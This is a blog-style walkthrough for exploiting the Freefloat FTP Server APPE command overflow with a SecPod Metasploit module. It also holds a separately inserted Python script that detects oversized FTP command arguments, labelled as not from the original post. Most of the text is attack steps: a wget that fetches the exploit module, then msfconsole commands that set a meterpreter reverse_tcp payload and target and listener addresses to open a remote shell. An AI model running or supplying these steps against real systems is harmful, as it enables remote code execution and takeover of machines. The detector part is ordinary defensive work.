
Freefloat FTP Server APPE Command Overflow in Metasploit

The Freefloat FTP Server APPE Command Overflow is not a 0-day exploit, but let me share with you a Metasploit module for it written by SecPod.

In order to run the module we first need to download the Ruby script and put it in this directory: /opt/framework/msf3/modules/exploits/windows/ftp

wget http://secpod.org/msf/freefloat_ftp_apee_cmd.rb

For those of you who don’t know, this exploit works against a Freefloat FTP Server running on Windows XP SP3. It exploits the “validation errors while processing DELE, MDTM, RETR, RMD, RNFR, RNTO, STOU, STOR, SIZE, APPE, STAT commands”. If the exploit is successful, it allows a remote attacker to execute arbitrary code, or it may cause a denial of service (DoS).
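A defender-side check for the behaviour described above, added here as an example that is not from the original post or from SecPod’s module: it inspects client-to-server FTP command lines and flags any command from the affected list whose argument is oversized or contains non-printable bytes. The 200-byte threshold and the sample session are assumptions, not values from the post.

```python
from typing import Optional

# Commands the post lists as affected by Freefloat FTP's argument-validation errors.
VULNERABLE_COMMANDS = {
    "DELE", "MDTM", "RETR", "RMD", "RNFR", "RNTO",
    "STOU", "STOR", "SIZE", "APPE", "STAT",
}

# Assumed threshold: legitimate file names on such a server are far shorter
# than this, so a longer argument to one of the commands above is suspicious.
MAX_ARG_LEN = 200


def inspect_command(line: bytes) -> Optional[dict]:
    """Return a finding for one raw FTP command line, or None if it looks benign."""
    text = line.rstrip(b"\r\n")
    # Split on the first space only; the argument may contain arbitrary bytes.
    parts = text.split(b" ", 1)
    cmd = parts[0].upper().decode("ascii", errors="replace")
    arg = parts[1] if len(parts) > 1 else b""
    if cmd not in VULNERABLE_COMMANDS:
        return None
    reasons = []
    if len(arg) > MAX_ARG_LEN:
        reasons.append(f"argument length {len(arg)} exceeds {MAX_ARG_LEN}")
    if any(b < 0x20 or b > 0x7E for b in arg):
        reasons.append("argument contains non-printable bytes")
    if not reasons:
        return None
    return {"command": cmd, "arg_len": len(arg), "reasons": reasons}


def scan_session(lines) -> list:
    """Run inspect_command over a client-to-server FTP command stream."""
    return [f for f in (inspect_command(l) for l in lines) if f]


# Constructed sample session (not real traffic): a normal login and upload,
# followed by an APPE with an oversized argument and a STAT with binary junk.
SAMPLE_SESSION = [
    b"USER anonymous\r\n",
    b"PASS guest@example.org\r\n",
    b"STOR report.txt\r\n",
    b"APPE " + b"A" * 1000 + b"\r\n",
    b"STAT " + b"\xff" * 50 + b"\r\n",
]

if __name__ == "__main__":
    for finding in scan_session(SAMPLE_SESSION):
        print(finding)
```

The same check can be run over a pcap’s reassembled FTP control channel or over a proxy’s command log; only the affected commands are inspected, so ordinary USER/PASS traffic is never flagged.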

[screenshot: port scan of the target]

Alright, fire up Metasploit (msfconsole) and select this exploit:

use exploit/windows/ftp/freefloat_ftp_apee_cmd

To learn more about this exploit, type info <exploitname>.

[screenshot: info output for freefloat_ftp_apee_cmd.rb]

Set the payload:

set payload windows/meterpreter/reverse_tcp

Assuming we have a Freefloat FTP Server on a Windows XP SP3 machine whose IP is 192.168.10.12, we need to set RHOST to that address:

set rhost 192.168.10.12

Then set the attacker host (LHOST); mine is 192.168.10.4:

set lhost 192.168.10.4

To choose the port on which the handler listens for the payload connection, type:

set lport <port>  (For example: set lport 445)

It’s up to you whether to change the listening port; the default is 4444. Once all options are set, run the exploit command.

[screenshot: running exploit against Freefloat FTP in Metasploit]

If you are new to Metasploit, you might want to read my Metasploit Basics article.
